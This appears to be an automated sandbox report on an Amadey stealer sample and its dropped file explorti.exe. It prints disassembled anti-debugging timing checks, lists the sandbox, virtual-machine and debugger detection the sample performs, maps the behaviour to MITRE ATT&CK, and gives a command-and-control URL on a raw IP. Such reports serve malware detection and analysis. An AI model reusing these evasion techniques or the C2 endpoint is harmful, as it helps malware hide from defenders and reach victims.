                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C03FE second address: 53C045B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F1CC8B8C9EEh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov ecx, edx 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 jmp 00007F1CC8B8C9EFh 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F1CC8B8C9EBh 0x00000024 and ah, 0000006Eh 0x00000027 jmp 00007F1CC8B8C9F9h 0x0000002c popfd 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 54301F6 second address: 54301FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 54301FA second address: 5430217 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5430217 second address: 543021C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 543021C second address: 543023E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1CC8B8C9F5h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 543023E second address: 543026D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1CC8BB7C3Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push edx 0x00000015 pop eax 0x00000016 mov ax, bx 0x00000019 popad 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 543026D second address: 5430322 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov cx, 481Dh 0x00000011 call 00007F1CC8B8C9EAh 0x00000016 pushfd 0x00000017 jmp 00007F1CC8B8C9F2h 0x0000001c sub esi, 3D0722A8h 0x00000022 jmp 00007F1CC8B8C9EBh 0x00000027 popfd 0x00000028 pop ecx 0x00000029 popad 0x0000002a push dword ptr [ebp+08h] 0x0000002d jmp 00007F1CC8B8C9EFh 0x00000032 call 00007F1CC8B8C9E9h 0x00000037 jmp 00007F1CC8B8C9F6h 0x0000003c push eax 0x0000003d pushad 0x0000003e mov ax, di 0x00000041 mov ax, dx 0x00000044 popad 0x00000045 mov eax, dword ptr [esp+04h] 0x00000049 jmp 00007F1CC8B8C9F6h 0x0000004e mov eax, dword ptr [eax] 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F1CC8B8C9EEh 0x00000057 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5430322 second address: 543033B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 543033B second address: 5430341 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5430341 second address: 5430347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5430347 second address: 543034B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 543034B second address: 5430364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1CC8BB7C3Eh 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5430364 second address: 543036A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 543038E second address: 54303E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C40h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, al 0x0000000c jmp 00007F1CC8BB7C40h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 movsx edi, ax 0x00000018 pushfd 0x00000019 jmp 00007F1CC8BB7C46h 0x0000001e and ah, 00000078h 0x00000021 jmp 00007F1CC8BB7C3Bh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 54303E3 second address: 54303FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9F4h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53D07F5 second address: 53D0812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53D0812 second address: 53D083F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F1CC8B8C9E9h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1CC8B8C9EDh 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53D083F second address: 53D0885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CC8BB7C47h 0x00000009 xor si, 9F8Eh 0x0000000e jmp 00007F1CC8BB7C49h 0x00000013 popfd 0x00000014 push esi 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53D0885 second address: 53D0889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53D0889 second address: 53D089F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53D089F second address: 53D08B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9EEh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53D08B1 second address: 53D08D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1CC8BB7C3Bh 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53D08D5 second address: 53D08DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53D08DB second address: 53D08EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Bh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53D08EA second address: 53D0901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1CC8B8C9EBh 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53D0901 second address: 53D093C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F1CC8BB7C41h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov dx, 331Eh 0x0000001a popad 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53D093C second address: 53D0989 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F1CC8B8C9E9h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov edx, 76EBDAA6h 0x00000016 pushfd 0x00000017 jmp 00007F1CC8B8C9F7h 0x0000001c jmp 00007F1CC8B8C9F3h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53D0989 second address: 53D098F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53D098F second address: 53D09CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov edx, 79D3019Ah 0x00000012 mov di, 9D66h 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007F1CC8B8C9ECh 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F1CC8B8C9EEh 0x00000029 rdtsc
                  Tries to evade debugger and weak emulator (self modifying code)
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSpecial instruction interceptor: First address: A6EB77 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSpecial instruction interceptor: First address: A6C0AE instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSpecial instruction interceptor: First address: C1F84B instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSpecial instruction interceptor: First address: C9FB86 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 44EB77 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 44C0AE instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 5FF84B instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 67FB86 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeCode function: 0_2_054302D7 rdtsc 0_2_054302D7
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 180000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1366Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1012Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 484Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 958Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 948Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1315Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3524Thread sleep count: 31 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3524Thread sleep time: -62031s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 4348Thread sleep count: 1366 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 4348Thread sleep time: -2733366s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6020Thread sleep count: 1012 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6020Thread sleep time: -2025012s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2260Thread sleep count: 484 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2260Thread sleep time: -14520000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7096Thread sleep time: -540000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 280Thread sleep count: 958 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 280Thread sleep time: -1916958s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1360Thread sleep count: 948 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1360Thread sleep time: -1896948s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 4960Thread sleep count: 1315 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 4960Thread sleep time: -2631315s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 180000Jump to behavior
                  Source: explorti.exe, explorti.exe, 00000006.00000002.2350660627.00000000005D1000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                  Source: explorti.exe, 00000001.00000002.4150196753.0000000001046000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWN
                  Source: explorti.exe, 00000001.00000002.4150196753.0000000001046000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Jl5yg1Km2s.exe, 00000000.00000002.1762379718.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000006.00000002.2350660627.00000000005D1000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                  Source: explorti.exe, 00000001.00000002.4150196753.0000000001003000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Hides threads from debuggers
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                  Tries to detect sandboxes and other dynamic analysis tools (window names)
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: gbdyllo
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: procmon_window_class
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: ollydbg
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: NTICE
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: SICE
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: SIWVID
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeCode function: 0_2_054302D7 rdtsc 0_2_054302D7
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_0041643B mov eax, dword ptr fs:[00000030h]1_2_0041643B
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_0041A1A2 mov eax, dword ptr fs:[00000030h]1_2_0041A1A2
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
                  Source: explorti.exe, explorti.exe, 00000006.00000002.2350660627.00000000005D1000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: OProgram Manager
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_003FD2E8 cpuid 1_2_003FD2E8
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_003FCAED GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,1_2_003FCAED

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Amadeys stealer DLL
                  Source: Yara matchFile source: 1.2.explorti.exe.3e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.explorti.exe.3e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Jl5yg1Km2s.exe.a00000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000003.1777304943.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.2310206865.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1721841303.0000000005210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2350558815.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1762264441.0000000000A01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Command and Scripting Interpreter                  		1
                  Scheduled Task/Job                  		12
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		1
                  Scheduled Task/Job                  		251
                  Virtualization/Sandbox Evasion                  		LSASS Memory741
                  Security Software Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading                  		12
                  Process Injection                  		Security Account Manager2
                  Process Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                  Obfuscated Files or Information                  		NTDS251
                  Virtualization/Sandbox Evasion                  		Distributed Component Object ModelInput Capture11
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                  Software Packing                  		LSA Secrets1
                  Application Window Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials1
                  File and Directory Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync224
                  System Information Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Jl5yg1Km2s.exe79%ReversingLabsWin32.Trojan.Multiverze
                  Jl5yg1Km2s.exe100%AviraTR/Crypt.TPM.Gen
                  Jl5yg1Km2s.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe100%AviraTR/Crypt.TPM.Gen
                  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe79%ReversingLabsWin32.Trojan.Multiverze

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://77.91.77.82/Hun4Ko/index.php100%URL Reputationphishing
                  http://77.91.77.82/Hun4Ko/index.php80%Avira URL Cloudsafe
                  http://77.91.77.82/0%Avira URL Cloudsafe
                  http://77.91.77.82/Hun4Ko/index.php?100%Avira URL Cloudphishing
                  http://77.91.77.82/Hun4Ko/index.php20%Avira URL Cloudsafe
                  http://77.91.77.82/Hun4Ko/index.phpKR0%Avira URL Cloudsafe
                  http://77.91.77.82/Hun4Ko/index.phpe0%Avira URL Cloudsafe
                  http://77.91.77.82/Hun4Ko/index.php$0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://77.91.77.82/Hun4Ko/index.phptrue
                  • URL Reputation: phishing
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://77.91.77.82/Hun4Ko/index.php$explorti.exe, 00000001.00000002.4150196753.0000000001003000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://77.91.77.82/explorti.exe, 00000001.00000002.4150196753.0000000001034000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://77.91.77.82/Hun4Ko/index.php2explorti.exe, 00000001.00000002.4150196753.0000000001003000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://77.91.77.82/Hun4Ko/index.php?explorti.exe, 00000001.00000002.4150196753.0000000001046000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: phishing
                  		unknown
                  http://77.91.77.82/Hun4Ko/index.php8explorti.exe, 00000001.00000002.4150196753.0000000001003000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://77.91.77.82/Hun4Ko/index.phpKRexplorti.exe, 00000001.00000002.4150196753.0000000001034000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://77.91.77.82/Hun4Ko/index.phpeexplorti.exe, 00000001.00000002.4150196753.0000000001003000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

